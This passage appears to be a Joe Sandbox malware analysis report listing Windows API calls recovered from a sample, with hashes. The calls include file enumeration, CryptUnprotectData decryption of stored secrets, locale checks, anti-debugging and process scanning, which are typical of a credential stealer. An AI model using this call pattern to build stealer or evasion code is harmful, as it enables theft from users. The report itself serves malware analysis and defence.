                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0091F985
                                      • StrCmpCA.SHLWAPI(?,004215BC), ref: 0091F9D6
                                      • StrCmpCA.SHLWAPI(?,004215C0), ref: 0091F9EC
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0091FD18
                                      • FindClose.KERNEL32(000000FF), ref: 0091FD2A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 3334442632-0
                                      • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                      • Instruction ID: b78eacae28c3178110731d699ca743449af373fc074918da4991c02047ac7288
                                      • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                      • Instruction Fuzzy Hash: 1EB14472A00228DFCB24FF60ED56FEE7379AF95300F4045A9A44A56195EF345B88CF92
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                      • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                      • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID: \*.*$@
                                      • API String ID: 433455689-2355794846
                                      • Opcode ID: 288ae8b34450d827941acc5218e6ee79c7fc578ee834c59a64948c78c4617425
                                      • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                      • Opcode Fuzzy Hash: 288ae8b34450d827941acc5218e6ee79c7fc578ee834c59a64948c78c4617425
                                      • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                      APIs
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 00911B8A
                                      • StrCmpCA.SHLWAPI(?,0042526C), ref: 00911BDA
                                      • StrCmpCA.SHLWAPI(?,00425314), ref: 00911BF0
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00911FA7
                                      • DeleteFileA.KERNEL32(00000000), ref: 00912031
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00912087
                                      • FindClose.KERNEL32(000000FF), ref: 00912099
                                        • Part of subcall function 0092AB87: lstrcpy.KERNEL32(00000000,?), ref: 0092ABD9
                                        • Part of subcall function 0092AB87: lstrcat.KERNEL32(00000000), ref: 0092ABE9
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 1415058207-0
                                      • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                      • Instruction ID: 592b5491ee3f91bb86507aca3dab18fdf94f0a72b61f4d8852cd46a422e539a3
                                      • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                      • Instruction Fuzzy Hash: 2C12BC72910228EBCF19EB60ED96FED7379AF94700F4045A9B10A62095EF746F88CF51
                                      APIs
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 0091E0C5
                                      • StrCmpCA.SHLWAPI(?,004214C8), ref: 0091E115
                                      • StrCmpCA.SHLWAPI(?,004214CC), ref: 0091E12B
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0091E647
                                      • FindClose.KERNEL32(000000FF), ref: 0091E659
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2325840235-0
                                      • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                      • Instruction ID: cde3f2942323b35cc8d1658c52e25d635fc80e74e2b411cbb164c6aa6f55c545
                                      • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                      • Instruction Fuzzy Hash: C2F19072914228DBCB19EB60ED95FEEB339AF94700F4041DAB04A62495EF346F89CF51
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                      • LocalFree.KERNEL32(00000000), ref: 00417D22
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID: /
                                      • API String ID: 3090951853-4001269591
                                      • Opcode ID: 198db3aa5887d918672e435fd44133e26d31687077b0e483e746916a964154e5
                                      • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                      • Opcode Fuzzy Hash: 198db3aa5887d918672e435fd44133e26d31687077b0e483e746916a964154e5
                                      • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                      APIs
                                      • memset.MSVCRT ref: 0091CABA
                                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0091CAD8
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0091CAE3
                                      • memcpy.MSVCRT(?,?,?), ref: 0091CB79
                                      • lstrcat.KERNEL32(?,00420B46), ref: 0091CBAA
                                      • lstrcat.KERNEL32(?,00420B47), ref: 0091CBBE
                                      • lstrcat.KERNEL32(?,00420B4E), ref: 0091CBDF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                      • String ID:
                                      • API String ID: 1498829745-0
                                      • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                      • Instruction ID: 79cdca035f0c6a331db0fff142911421e5b8888838f88ab52037a54a4faea932
                                      • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                      • Instruction Fuzzy Hash: 114151B8A4421DEFDB10DFD0DD89BFEBBB8BB44704F1045A8E509A6280D7745A84CF95
                                      APIs
                                      • memset.MSVCRT ref: 0040C853
                                      • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,009A95A0), ref: 0040C871
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                      • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                      • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                      • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                      • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                      • String ID:
                                      • API String ID: 1498829745-0
                                      • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                      • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                      • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                      • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                      APIs
                                      • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,009A94C0,?,0042110C,?,00000000,?), ref: 0041696C
                                      • sscanf.NTDLL ref: 00416999
                                      • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,009A94C0,?,0042110C), ref: 004169B2
                                      • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,009A94C0,?,0042110C), ref: 004169C0
                                      • ExitProcess.KERNEL32 ref: 004169DA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID: B
                                      • API String ID: 2533653975-2248957098
                                      • Opcode ID: 25b1fc0de802deb85f557e74d5206f7c9883577e3e1e1b34651bba61df55aea8
                                      • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                      • Opcode Fuzzy Hash: 25b1fc0de802deb85f557e74d5206f7c9883577e3e1e1b34651bba61df55aea8
                                      • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                      • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID: N@
                                      • API String ID: 4291131564-4229412743
                                      • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                      • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                      • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                      • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                      APIs
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00927E48
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00927E60
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00927E74
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00927EC9
                                      • LocalFree.KERNEL32(00000000), ref: 00927F89
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID:
                                      • API String ID: 3090951853-0
                                      • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                      • Instruction ID: 09ed514e0cbb33dfa5d3ebc13e6692eb8919cc060a34e8712cef14fdfb6d85fc
                                      • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                      • Instruction Fuzzy Hash: 90413A72945228EBCB24DF94ED89BEDB3B5EB44700F2041D9E009A2195DB342F85CFA1
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 0092BE09
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0092BE1E
                                      • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0092BE29
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0092BE45
                                      • TerminateProcess.KERNEL32(00000000), ref: 0092BE4C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                      • Instruction ID: c121e03e1569358c0c11d9d63686ab26a98e7b37ce9cba18e13cdd42f00a5dbc
                                      • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                      • Instruction Fuzzy Hash: 3721A3BC9002159FDB14DF69F889A963BF4FB0A314F504039E909872A5EBB05985EF49
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                      • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                      • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                      • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                      • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                      • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 009174B4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009174BB
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009174E8
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 0091750B
                                      • LocalFree.KERNEL32(?), ref: 00917515
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 2609814428-0
                                      • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                      • Instruction ID: d29aaa8d5e29fce1bbca58894d4b898713c1bc7ca399c3a52219c4bb4764b244
                                      • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                      • Instruction Fuzzy Hash: 46010075B84208BBEB10DFD4DD45F9D77B9EB44704F104155F705AA2C0D670AA008B65
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                      • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 3657800372-0
                                      • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                      • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                      • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                      • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00929885
                                      • Process32First.KERNEL32(00420ACA,00000128), ref: 00929899
                                      • Process32Next.KERNEL32(00420ACA,00000128), ref: 009298AE
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 009298C3
                                      • CloseHandle.KERNEL32(00420ACA), ref: 009298E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                      • Instruction ID: 99ac43f483d76b0902f077c84d9cb30880c3b569f6ebe97f0d99727cbb498fb6
                                      • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                      • Instruction Fuzzy Hash: E1014C79A40218FFCB20DFE4DC54BEDB7F9EF0A300F044189A505A6240D7749A40CF51
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                      • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                      • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                      • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                      • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                      • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                      • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                      APIs
                                        • Part of subcall function 0092A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0092A9EF
                                        • Part of subcall function 0092AB87: lstrcpy.KERNEL32(00000000,?), ref: 0092ABD9
                                        • Part of subcall function 0092AB87: lstrcat.KERNEL32(00000000), ref: 0092ABE9
                                        • Part of subcall function 0092AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0092AC2C
                                        • Part of subcall function 0092AC17: lstrcpy.KERNEL32(00000000), ref: 0092AC6B
                                        • Part of subcall function 0092AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0092AC79
                                        • Part of subcall function 0092AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0092AB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 0091E709
                                      • StrCmpCA.SHLWAPI(?,004214F8), ref: 0091E759
                                      • StrCmpCA.SHLWAPI(?,004214FC), ref: 0091E76F
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0091EE46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904591833.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_910000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID:
                                      • API String ID: 433455689-0
